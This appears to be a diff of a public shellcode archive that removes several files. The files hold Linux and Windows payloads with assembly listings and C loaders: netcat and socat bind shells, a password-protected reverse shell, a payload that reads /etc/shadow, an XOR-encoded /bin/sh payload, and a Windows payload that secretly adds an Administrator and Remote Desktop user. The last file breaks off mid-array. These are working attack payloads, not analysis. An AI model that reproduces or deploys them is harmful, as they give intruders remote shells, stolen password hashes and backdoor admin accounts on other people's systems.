# Version: Linux x86
# Tested on: Linux x86
## linux x86 nc -lvve/bin/sh -p13377 shellcode
## This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
# 31 c0 xor %eax,%eax
# 31 d2 xor %edx,%edx
# 50 push eax
# 68 33 33 37 37 push $0x37373333
# 68 2d 76 70 31 push $0x3170762d
# 89 e2 mov %esp,%edx
# 50 push %eax
# 68 6e 2f 73 68 push $0x68732f6e
# 68 65 2f 62 69 push $0x69622f65
# 68 2d 6c 76 76 push $0x76766c2d
# 89 e1 mov %esp,%ecx
# 50 push %eax
# 68 2f 2f 6e 63 push $0x636e2f2f
# 68 2f 2f 2f 2f push $0x2f2f2f2f
# 68 2f 62 69 6e push $0x6e69622f
# 89 e3 mov %esp,%ebx
# 50 push %eax
# 52 push %edx
# 51 push %ecx
# 53 push %ebx
# 31 d2 xor %edx,%edx
# 89 e1 mov %esp,%ecx
# b0 0b mov $0xb,%al
# cd 80 int $0x80
\x31\xc0\x31\xd2\x50\x68\x33\x33\x37\x37\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d\x6c\x76\x76\x89\xe1\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x50\x52\x51\x53\x31\xd2\x89\xe1\xb0\x0b\xcd\x80

92
shellcodes/linux/49442.c
View file

@ -1,92 +0,0 @@
/*
Exploit Title: Linux/x64 - Reverse Shell
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================
This shellcode connects back to 127.1.1.1 address on port 4444
Listener needs to be opened before execute: nc -lvp 4444
Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
/*
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 99 cdq
a: 0f 05 syscall
c: 50 push rax
d: 5f pop rdi
e: 52 push rdx
f: 68 7f 01 01 01 push 0x101017f
14: 66 68 11 5c pushw 0x5c11
18: 66 6a 02 pushw 0x2
1b: 6a 2a push 0x2a
1d: 58 pop rax
1e: 54 push rsp
1f: 5e pop rsi
20: 6a 10 push 0x10
22: 5a pop rdx
23: 0f 05 syscall
25: 6a 02 push 0x2
27: 5e pop rsi
28: 6a 21 push 0x21
2a: 58 pop rax
2b: 0f 05 syscall
2d: 48 ff ce dec rsi
30: 79 f6 jns 28 <loop_1>
32: 6a 01 push 0x1
34: 58 pop rax
35: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
3c: 64 3a 20
3f: 41 51 push r9
41: 54 push rsp
42: 5e pop rsi
43: 6a 08 push 0x8
45: 5a pop rdx
46: 0f 05 syscall
48: 48 31 c0 xor rax,rax
4b: 48 83 c6 08 add rsi,0x8
4f: 0f 05 syscall
51: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
58: 36 37 38
5b: 56 push rsi
5c: 5f pop rdi
5d: 48 af scas rax,QWORD PTR es:[rdi]
5f: 75 1a jne 7b <exit_program>
61: 6a 3b push 0x3b
63: 58 pop rax
64: 99 cdq
65: 52 push rdx
66: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
6d: 2f 73 68
70: 53 push rbx
71: 54 push rsp
72: 5f pop rdi
73: 52 push rdx
74: 54 push rsp
75: 5a pop rdx
76: 57 push rdi
77: 54 push rsp
78: 5e pop rsi
79: 0f 05 syscall
*/
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x50\x5f\x52\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41\x51\x54\x5e\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1a\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x52\x54\x5a\x57\x54\x5e\x0f\x05";
void main()
{
printf("ShellCode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

107
shellcodes/linux/49472.c
View file

@ -1,107 +0,0 @@
/*
Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================
Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
"\x0f\x05";
void main()
{
printf("ShellCode Lenght: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/*
ASM
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 48 31 d2 xor rdx,rdx
c: 0f 05 syscall
e: 50 push rax
f: 5f pop rdi
10: 52 push rdx
11: 52 push rdx
12: 66 68 11 5c pushw 0x5c11
16: 66 6a 02 pushw 0x2
19: 6a 31 push 0x31
1b: 58 pop rax
1c: 54 push rsp
1d: 5e pop rsi
1e: b2 10 mov dl,0x10
20: 0f 05 syscall
22: 6a 32 push 0x32
24: 58 pop rax
25: 6a 02 push 0x2
27: 5e pop rsi
28: 0f 05 syscall
2a: 6a 2b push 0x2b
2c: 58 pop rax
2d: 48 31 f6 xor rsi,rsi
30: 99 cdq
31: 0f 05 syscall
33: 50 push rax
34: 5f pop rdi
35: 6a 02 push 0x2
37: 5e pop rsi
38: 6a 21 push 0x21
3a: 58 pop rax
3b: 0f 05 syscall
3d: 48 ff ce dec rsi
40: 79 f6 jns 38 <loop_1>
42: 6a 01 push 0x1
44: 58 pop rax
45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
4c: 64 3a 20
4f: 41 51 push r9
51: 48 89 e6 mov rsi,rsp
54: 6a 08 push 0x8
56: 5a pop rdx
57: 0f 05 syscall
59: 48 31 c0 xor rax,rax
5c: 48 83 c6 08 add rsi,0x8
60: 0f 05 syscall
62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
69: 36 37 38
6c: 56 push rsi
6d: 5f pop rdi
6e: 48 af scas rax,QWORD PTR es:[rdi]
70: 75 1c jne 8e <exit_program>
72: 48 31 c0 xor rax,rax
75: 50 push rax
76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
7d: 2f 73 68
80: 53 push rbx
81: 54 push rsp
82: 5f pop rdi
83: 50 push rax
84: 54 push rsp
85: 5a pop rdx
86: 57 push rdi
87: 54 push rsp
88: 5e pop rsi
89: 6a 3b push 0x3b
8b: 58 pop rax
8c: 0f 05 syscall
*/

63
shellcodes/linux_x86-64/49547.c
View file

@ -1,63 +0,0 @@
# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
# Date: 02-08-2021
# Author: Felipe Winsnes
# Tested on: Debian x64
# Shellcode Length: 66
/*
global _start
_start:
xor rax, rax ; Zeroes out RAX.
xor rbp, rbp ; Zeroes out RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
push rbp ; Pushes the vaueof RBP into the Stack.
mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
push rbp ; Pushes the vaue of RBP into the Stack.
mov rbp, rsp ; Copies the value of the Stack into RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
push rbx ; Pushes the vaue of RBX into the Stack.
mov rbx, rsp ; Copies the value of the Stack into RBX.
mov rdi, rsp ; Copies the value of the Stack into RDI.
push rax ; Pushes RAX's NULL-DWORD.
mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
push rbp ; Pushes the vaue of RBP into the Stack.
push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
mov rsi, rsp ; Copies this entire string from the Stack into RSI.
push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
pop ax ; Pops this value into AX so there are no NULLs.
syscall ; The syscall is executed.
*/
/*
Usage:
whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
*/
#include <stdio.h>
unsigned char shellcode[] = \
"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}

72
shellcodes/linux_x86/49446.c
View file

@ -1,72 +0,0 @@
/* Exploit Title: Linux/x86 - Socat Bind Shellcode (113 bytes)
Date: 01-19-2021
Author: Felipe Winsnes
Tested on: Debian x86
Shellcode Length: 113
global _start
section .text
_start:
xor eax, eax
push eax
PUSH 0x30303030 ; "tcp-listen:10000"
PUSH 0x313a6e65
PUSH 0x7473696c
PUSH 0x2d706374
mov esi, esp
push eax
PUSH 0x2c656e61 ; "exec:'bash',pty,stderr,setsid,sigint,sane,"
PUSH 0x732c746e
PUSH 0x69676973
PUSH 0x2c646973
PUSH 0x7465732c
PUSH 0x72726564
PUSH 0x74732c79
PUSH 0x74702c68
PUSH 0x7361623a
PUSH 0x63657865
mov edi, esp
push eax
PUSH 0x7461636f ; "///usr/bin/socat"
PUSH 0x732f6e69
PUSH 0x622f7273
PUSH 0x752f2f2f
mov ebx, esp
push eax
mov edx, esp
push esi
push edi
push ebx
mov ecx, esp
mov al, 11
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x30\x30\x30\x30\x68\x65\x6e\x3a\x31\x68\x6c\x69\x73\x74\x68\x74\x63\x70\x2d\x89\xe6\x50\x68\x61\x6e\x65\x2c\x68\x6e\x74\x2c\x73\x68\x73\x69\x67\x69\x68\x73\x69\x64\x2c\x68\x2c\x73\x65\x74\x68\x64\x65\x72\x72\x68\x79\x2c\x73\x74\x68\x68\x2c\x70\x74\x68\x3a\x62\x61\x73\x68\x65\x78\x65\x63\x89\xe7\x50\x68\x6f\x63\x61\x74\x68\x69\x6e\x2f\x73\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x89\xe2\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

74
shellcodes/linux_x86/49976.c
View file

@ -1,74 +0,0 @@
# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
# Date: 09/06/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
shellcode with XOR decoder stub and fstenv MMX FPU
spawning a /bin/sh shell
uses the fstenv GetPC technique to get the memory address dynamically
(alternative to jmp-call-pop)
Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
./mmx-xor-decoder_eip
Shellcode Length: 70
# id
uid=0(root) gid=0(root) groups=0(root)
# ps -p $$
PID TTY TIME CMD
24045 pts/4 00:00:00 sh
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
/***
; shellcode assembly
global _start
section .text
_start:
fldz
fstenv [esp-0xc]
pop edi ; put eip into edi
add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)
lea esi, [edi + 8]
xor ecx, ecx
mov cl, 4
decode:
movq mm0, qword [edi]
movq mm1, qword [esi]
pxor mm0, mm1
movq qword [esi], mm0
add esi, 0x8
loop decode
jmp short EncodedShellcode
shellcode:
decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d
***/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
void main(void)
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int(*ret)() = (int(*)())shellcode;
ret();
}

133
shellcodes/windows_x86-64/49819.c
View file

@ -1,133 +0,0 @@
# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Shellcode Description:
# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
; Compile & get shellcode from Kali:
; nasm -f win64 popcalc.asm -o popcalc.o
; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0
; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL
; );
xor rcx, rcx
mul rcx ; RAX & RDX & RCX = 0x0
; calc.exe | String length : 8
push rax ; Null terminate string on stack
mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe"
not rax
;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163
push rax ; RSP = "calc.exe",0x0
mov rcx, rsp ; RCX = "calc.exe",0x0
inc rdx ; RDX = 0x1 = SW_SHOWNORMAL
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec("calc.exe", SW_HIDE)
###########################################################################################################################################
// runShellcode.c
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
#include <windows.h>
void main() {
void* exec;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Shellcode
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6";
unsigned int payload_len = 205;
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, payload, payload_len);
rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(th, -1);
}

193
shellcodes/windows_x86-64/49820.c
View file

@ -1,193 +0,0 @@
# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: 02/05/2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Full Disclosure: github.com/boku7/x64win-AddRdpAdminShellcode
# Shellcode Description:
# 64bit Windows 10 shellcode that adds user BOKU:SP3C1ALM0V3 to the system and the localgroups
# Administrators & "Remote Desktop Users". Position Independent Code (PIC) that dynamically resolves
# KERNEL32 DLL via PEB & LDR. Shellcode contains no null bytes, and therefor can be used on typical
# stack based Buffer OverFlow vulnerabilities. Shellcode must be executed from a process with either
# a HIGH or SYSTEM integrity level.
; nasm -f win64 addRdpAdmin.asm -o addRdpAdmin.o
; for i in $(objdump -D addRdpAdmin.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll
; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable
; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable
jmp short apis
; Get the address of the API from the Kernel32.dll ExportTable
getapiaddr:
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
loop:
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
incloop:
inc rax
jmp short loop
; Find the address of GetProcAddress by using the last value of the Counter
resolveaddr:
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller
apis: ; API Names to resolve addresses
; WinExec | String length : 7
xor rcx, rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec
not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis
shr rax, 0x8 ; cexEniW,0xF0 --> 0x00,cexEniW
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable
mov r14, rax ; R14 = Kernel32.WinExec Address
jmp short command
WinExec:
; UINT WinExec(
; LPCSTR lpCmdLine, => RCX = <COMMAND STRING> + 0x00 (Null Terminated)
; UINT uCmdShow => RDX = 0x0 = SW_HIDE
; );
xor rdx, rdx ; RDX = 0x0 = SW_HIDE
sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA)
call r14 ; Call WinExec(<COMMNAD>, SW_HIDE)
add rsp, 0x20 ; Fix stack
ret
command:
; WinExec("cmd.exe /c net user BOKU SP3C1ALM0V3 /add && net localgroup Administrators BOKU /add && net localgroup \"Remote Desktop Users\" BOKU /add", 0x0);
; 63 6D 64 2E 65 78 65 20 2F 63 20 6E 65 74 20 75 cmd.exe /c net u
; 73 65 72 20 42 4F 4B 55 20 53 50 33 43 31 41 4C ser BOKU SP3C1AL
; 4D 30 56 33 20 2F 61 64 64 20 26 26 20 6E 65 74 M0V3 /add && net
; 20 6C 6F 63 61 6C 67 72 6F 75 70 20 41 64 6D 69 localgroup Admi
; 6E 69 73 74 72 61 74 6F 72 73 20 42 4F 4B 55 20 nistrators BOKU
; 2F 61 64 64 20 26 26 20 6E 65 74 20 6C 6F 63 61 /add && net loca
; 6C 67 72 6F 75 70 20 22 52 65 6D 6F 74 65 20 44 lgroup "Remote D
; 65 73 6B 74 6F 70 20 55 73 65 72 73 22 20 42 4F esktop Users" BO
; 4B 55 20 2F 61 64 64 00 KU /add.
; String length : 135
mov rax, 0x6464612f20554bFF ; dda/ UK : 6464612f20554b
shr rax, 0x8
push rax
mov rax, 0x4f42202273726573 ; OB "sres : 4f42202273726573
push rax
mov rax, 0x5520706f746b7365 ; U potkse : 5520706f746b7365
push rax
mov rax, 0x442065746f6d6552 ; D etomeR : 442065746f6d6552
push rax
mov rax, 0x222070756f72676c ; " puorgl : 222070756f72676c
push rax
mov rax, 0x61636f6c2074656e ; acol ten : 61636f6c2074656e
push rax
mov rax, 0x202626206464612f ; && dda/ : 202626206464612f
push rax
mov rax, 0x20554b4f42207372 ; UKOB sr : 20554b4f42207372
push rax
mov rax, 0x6f7461727473696e ; otartsin : 6f7461727473696e
push rax
mov rax, 0x696d64412070756f ; imdA puo : 696d64412070756f
push rax
mov rax, 0x72676c61636f6c20 ; rglacol : 72676c61636f6c20
push rax
mov rax, 0x74656e2026262064 ; ten && d : 74656e2026262064
push rax
mov rax, 0x64612f203356304d ; da/ 3V0M : 64612f203356304d
push rax
mov rax, 0x4c41314333505320 ; LA1C3PS : 4c41314333505320
push rax
mov rax, 0x554b4f4220726573 ; UKOB res : 554b4f4220726573
push rax
mov rax, 0x752074656e20632f ; u ten c/ : 752074656e20632f
push rax
mov rax, 0x206578652e646d63 ; exe.dmc : 206578652e646d63
push rax
mov rcx, rsp ; RCX = <COMMAND STRING>,0x0
call WinExec
###########################################################################################################################################
#include <windows.h>
// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net)
int main(void) {
void* exec_mem;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
unsigned char payload[] =
"\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49"
